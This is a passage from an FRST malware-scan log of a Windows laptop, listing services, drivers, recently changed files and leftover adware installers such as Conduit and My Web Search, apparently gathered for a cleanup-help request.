R2 FastFreeConverterUpdt; C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe [193024 2013-07-29] () [File not signed]
R2 LeapFrog Connect Device Service; C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe [7241728 2014-07-11] (LeapFrog Enterprises, Inc.) [File not signed]
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe [126392 2009-08-24] (Symantec Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [315648 2015-09-28] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [43664 2015-01-28] ()
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2012-07-05] (Duplex Secure Ltd.)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-08-27] (Toshiba Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 22:47 - 2016-03-08 22:48 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64.exe
2016-03-08 22:11 - 2016-03-08 22:11 - 00016148 _____ C:\WINDOWS\system32\DURABLE_Lexi_HistoryPrediction.bin
2016-03-08 12:39 - 2016-03-08 12:39 - 00058675 _____ C:\Users\Lexi\Desktop\FRST.txt
2016-03-08 12:39 - 2016-03-08 12:39 - 00050962 _____ C:\Users\Lexi\Desktop\Addition.txt
2016-03-08 12:25 - 2016-03-08 12:39 - 00050962 _____ C:\Users\Lexi\Downloads\Addition.txt
2016-03-08 12:22 - 2016-03-08 22:48 - 00041785 _____ C:\Users\Lexi\Downloads\FRST.txt
2016-03-08 12:22 - 2016-03-08 22:48 - 00000000 ____D C:\FRST
2016-03-08 09:47 - 2016-03-08 22:03 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-08 09:28 - 2016-03-08 09:28 - 00001049 _____ C:\Users\Lexi\Documents\malwaresecondtime.txt
2016-03-08 09:27 - 2016-03-08 09:27 - 00081882 _____ C:\Users\Lexi\Documents\malwarfirsttime.txt
2016-03-07 23:01 - 2016-03-08 09:36 - 00000000 ____D C:\Users\Lexi\AppData\Local\Deployment
2016-03-06 21:09 - 2016-03-06 21:09 - 00058906 _____ C:\Users\Lexi\Desktop\sfcdetails.txt
2016-03-04 09:58 - 2016-03-08 22:06 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-04 09:58 - 2016-03-04 09:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 23:59 - 2016-03-07 13:16 - 00000000 ____D C:\AdwCleaner
2016-03-02 17:45 - 2016-03-02 17:45 - 00002675 _____ C:\Users\Lexi\Downloads\Your Great Value Vacations The notice on that all  documents are ready 20160003149979 _.html
2016-03-01 19:50 - 2016-03-01 19:50 - 00024404 _____ C:\Users\Lexi\Downloads\Aerobic Cellular Respiration Summary Table.pdf
2016-03-01 19:31 - 2016-03-01 19:31 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide (1).pdf
2016-03-01 19:30 - 2016-03-01 19:30 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide.pdf
2016-02-29 16:32 - 2016-02-29 16:32 - 00346580 _____ C:\Users\Lexi\Downloads\securedoc_20160219T091446.html
2016-02-29 16:10 - 2016-02-29 16:10 - 00137376 _____ C:\Users\Lexi\Downloads\March homework 2016.pdf
2016-02-25 20:18 - 2016-02-25 20:18 - 00537031 _____ C:\Users\Lexi\Downloads\msert.exe
2016-02-25 13:02 - 2016-02-25 21:16 - 08583186 _____ C:\Users\Lexi\Documents\AVG BIO101 template6.pptx
2016-02-24 23:06 - 2016-02-24 23:06 - 01112064 _____ C:\Users\Lexi\Downloads\05_Clicker_Questions.ppt
2016-02-24 23:05 - 2016-02-24 23:06 - 00773109 _____ C:\Users\Lexi\Downloads\06_Animations.zip
2016-02-24 23:05 - 2016-02-24 23:06 - 00747369 _____ C:\Users\Lexi\Downloads\06_Videos.zip
2016-02-24 23:05 - 2016-02-24 23:05 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions (1).ppt
2016-02-24 23:04 - 2016-02-24 23:04 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions.ppt
2016-02-24 18:01 - 2016-02-24 18:01 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-02-21 17:28 - 2016-02-21 17:29 - 41085818 _____ C:\Users\Lexi\Downloads\05_Videos.zip
2016-02-21 17:28 - 2016-02-21 17:29 - 127679537 _____ C:\Users\Lexi\Downloads\05_BioFlix_Animations.zip
2016-02-21 17:28 - 2016-02-21 17:28 - 02486374 _____ C:\Users\Lexi\Downloads\05_Animations.zip
2016-02-20 19:59 - 2016-02-20 19:59 - 00262144 _____ C:\WINDOWS\Minidump\022016-45890-01.dmp
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report.csv
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report (1).csv
2016-02-17 18:02 - 2016-03-08 22:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2016-02-17 18:02 - 2016-02-17 18:02 - 00002523 _____ C:\Users\Public\Desktop\Evernote.lnk
2016-02-11 22:52 - 2016-02-11 22:52 - 00028661 _____ C:\Users\Lexi\Downloads\A Tour of the Cell Study Guide (1).pdf
2016-02-10 12:09 - 2016-02-10 12:09 - 08817344 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2016-02-10 09:09 - 2016-01-31 01:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 09:09 - 2016-01-31 00:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 09:09 - 2016-01-31 00:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 09:09 - 2016-01-31 00:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 09:09 - 2016-01-31 00:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 09:09 - 2016-01-31 00:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 09:09 - 2016-01-31 00:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 09:09 - 2016-01-31 00:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 09:09 - 2016-01-30 23:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 09:09 - 2016-01-30 23:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-07 10:25 - 2016-02-07 10:25 - 00143306 _____ C:\Users\Lexi\Downloads\Module_1 (3).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 22:20 - 2016-01-28 23:32 - 00004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5ED844AE-3C2D-4062-87D9-F7E3150673DE}
2016-03-08 22:11 - 2015-08-27 20:13 - 00000000 ____D C:\Users\Lexi
2016-03-08 22:09 - 2012-04-07 21:50 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-08 22:08 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-08 22:06 - 2016-01-28 15:11 - 00000000 ____D C:\Program Files (x86)\Avidemux 2.6 - 32 bits
2016-03-08 22:06 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\AppLocker
2016-03-08 22:06 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\File Type Helper
2016-03-08 22:06 - 2013-06-18 14:18 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46
2016-03-08 22:06 - 2013-02-20 00:03 - 00000000 ____D C:\WINDOWS\SysWOW64\C2MP
2016-03-08 22:06 - 2010-08-13 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.com
2016-03-08 22:05 - 2015-11-14 19:53 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-08 22:05 - 2015-07-10 08:14 - 00000000 ____D C:\WINDOWS\ShellNew
2016-03-08 22:05 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\WinMetadata
2016-03-08 22:05 - 2015-07-10 06:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-08 22:05 - 2013-09-26 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skitch
2016-03-08 22:05 - 2013-07-20 16:02 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClockworkMod
2016-03-08 22:05 - 2011-08-24 08:48 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Duplicate Cleaner
2016-03-08 22:05 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-03-08 22:04 - 2016-02-01 17:19 - 00000000 ____D C:\WINDOWS\Minidump
2016-03-08 22:04 - 2016-01-28 16:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:04 - 2016-01-28 15:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avidemux (32bits)
2016-03-08 22:04 - 2015-07-10 08:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-03-08 22:04 - 2015-07-10 04:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-03-08 22:04 - 2013-09-10 08:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2016-03-08 22:04 - 2013-01-17 18:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BodyMedia
2016-03-08 22:04 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Scholastic
2016-03-08 22:04 - 2012-09-15 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-03-08 22:04 - 2012-06-22 18:42 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\PCCUStubInstaller
2016-03-08 22:04 - 2011-08-24 08:18 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-03-08 22:04 - 2011-06-14 21:43 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\FunWebProducts
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Conduit
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\Local\Conduit
2016-03-08 22:04 - 2010-09-24 19:55 - 00000000 ____D C:\Users\Lexi\Documents\Audible
2016-03-08 22:04 - 2010-09-19 09:15 - 00000000 ____D C:\Users\Lexi\AppData\Local\Microsoft Help
2016-03-08 22:03 - 2016-01-28 16:40 - 00000000 ____D C:\Program Files (x86)\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:03 - 2013-09-10 08:38 - 00000000 ____D C:\Program Files (x86)\Coupons
2016-03-08 22:03 - 2013-07-20 16:01 - 00000000 ____D C:\Program Files (x86)\ClockworkMod
2016-03-08 22:03 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\Fast Free Converter
2016-03-08 22:03 - 2013-06-18 14:18 - 00000000 ____D C:\Program Files (x86)\MixiDJ_V46
2016-03-08 22:03 - 2013-06-18 14:18 - 00000000 ____D C:\Program Files (x86)\Conduit
2016-03-08 22:03 - 2013-05-28 16:57 - 00000000 ____D C:\Program Files (x86)\Evernote
2016-03-08 22:03 - 2013-05-27 22:25 - 00000000 ____D C:\Program Files (x86)\Belarc
2016-03-08 22:03 - 2013-01-17 18:40 - 00000000 ____D C:\Program Files (x86)\BodyMedia
2016-03-08 22:03 - 2012-12-03 01:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-03-08 22:03 - 2012-09-15 23:53 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-03-08 22:03 - 2012-06-18 22:23 - 00000000 ____D C:\Program Files (x86)\LG Electronics
2016-03-08 22:03 - 2011-08-24 08:49 - 00000000 ____D C:\Program Files (x86)\Bing Bar Installer
2016-03-08 22:03 - 2011-08-24 08:48 - 00000000 ____D C:\Program Files (x86)\Duplicate Cleaner
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iTunes
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iPod
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files\Bonjour
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files (x86)\Bonjour
2016-03-08 22:03 - 2011-01-14 18:51 - 00000000 ____D C:\Program Files (x86)\Cozi Express
2016-03-08 22:03 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-08 22:03 - 2010-05-28 20:35 - 00000000 ____D C:\Program Files (x86)\TOSHIBA
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ____D C:\Program Files\TOSHIBA
2016-03-08 21:48 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\registration
2016-03-08 21:47 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\SystemResources
2016-03-08 21:42 - 2014-04-26 20:45 - 00000000 ____D C:\Users\Lexi\Documents\Bio101
2016-03-08 21:41 - 2015-08-27 20:40 - 00000000 ____D C:\Users\Lexi\AppData\Local\Packages
2016-03-08 21:38 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
2016-03-08 21:38 - 2010-08-20 12:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Google
2016-03-08 21:37 - 2011-08-24 08:17 - 00000000 ____D C:\ProgramData\Apple
2016-03-08 21:36 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files\Google
2016-03-08 21:34 - 2010-08-13 21:25 - 00000000 __RHD C:\MSOCache
2016-03-08 20:56 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-07 22:57 - 2011-01-14 18:51 - 00000000 ____D C:\ProgramData\Cozi
2016-03-07 22:56 - 2010-08-13 21:56 - 00000000 ____D C:\Program Files (x86)\TOSHIBA Corporation
2016-03-07 22:31 - 2013-09-26 08:59 - 00000000 ____D C:\Users\Lexi\AppData\Local\Skitch
2016-03-04 11:31 - 2010-08-13 21:57 - 00000000 ___HD C:\WINDOWS\msdownld.tmp
2016-03-04 07:39 - 2015-08-28 00:05 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-04 07:19 - 2015-10-30 04:42 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-03 23:16 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\Documents\Storia
2016-02-26 12:07 - 2010-09-04 17:25 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\AnVi
2016-02-25 22:42 - 2015-08-27 20:11 - 01005598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-25 20:45 - 2010-08-30 21:35 - 00012288 _____ C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-02-20 19:59 - 2013-01-13 11:18 - 630943674 _____ C:\WINDOWS\MEMORY.DMP
2016-02-20 14:50 - 2016-01-28 11:18 - 00000000 ____D C:\Users\Lexi\AppData\Local\Screencast-O-Matic-v2
2016-02-19 17:17 - 2013-03-05 16:40 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-19 17:17 - 2013-03-05 16:40 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-16 22:45 - 2015-07-10 04:05 - 07864320 ___SH C:\WINDOWS\system32\config\BBI
2016-02-16 22:41 - 2016-01-12 21:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-16 22:41 - 2012-05-30 11:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-10 14:17 - 2013-08-07 12:46 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-10 14:01 - 2013-05-27 17:31 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2016-01-28 17:15 - 2016-01-28 17:15 - 0000047 _____ () C:\Users\Lexi\AppData\Roaming\WB.CFG
2011-03-24 12:02 - 2015-12-07 21:16 - 0000618 _____ () C:\Users\Lexi\AppData\Roaming\wklnhst.dat
2010-08-30 21:35 - 2016-02-25 20:45 - 0012288 _____ () C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-30 18:11 - 2011-09-30 18:11 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe
2011-12-24 15:45 - 2011-12-24 15:45 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe
2012-01-25 15:47 - 2012-01-25 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe
2011-11-01 21:04 - 2011-11-01 21:04 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe
2011-10-16 11:32 - 2011-10-16 11:32 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe
2011-08-13 08:55 - 2011-08-13 08:55 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe
2012-01-26 18:05 - 2012-01-26 18:05 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe
2011-09-19 14:57 - 2011-09-19 14:57 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe
2011-10-15 12:37 - 2011-10-15 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe
2011-09-21 21:26 - 2011-09-21 21:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe
2011-11-10 10:20 - 2011-11-10 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe
2011-08-08 18:26 - 2011-08-08 18:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe
2011-10-20 12:37 - 2011-10-20 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe
2012-01-11 16:26 - 2012-01-11 16:26 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe
2011-12-20 17:09 - 2011-12-20 17:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe
2011-09-14 17:15 - 2011-09-14 17:15 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe
2011-12-20 02:23 - 2011-12-20 02:23 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe
2011-09-11 09:14 - 2011-09-11 09:14 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe
2011-08-31 16:17 - 2011-08-31 16:17 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(0431a317).exe
2011-08-09 13:53 - 2011-08-09 13:53 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe
2011-08-25 12:37 - 2011-08-25 12:37 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe
2012-01-21 20:50 - 2012-01-21 20:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(05af0912).exe
2011-09-01 10:44 - 2011-09-01 10:44 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe
2011-10-02 17:23 - 2011-10-02 17:23 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe
2011-11-18 10:20 - 2011-11-18 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0cc139e7).exe
2011-12-27 20:18 - 2011-12-27 20:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe
2011-08-28 06:05 - 2011-08-28 06:05 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe
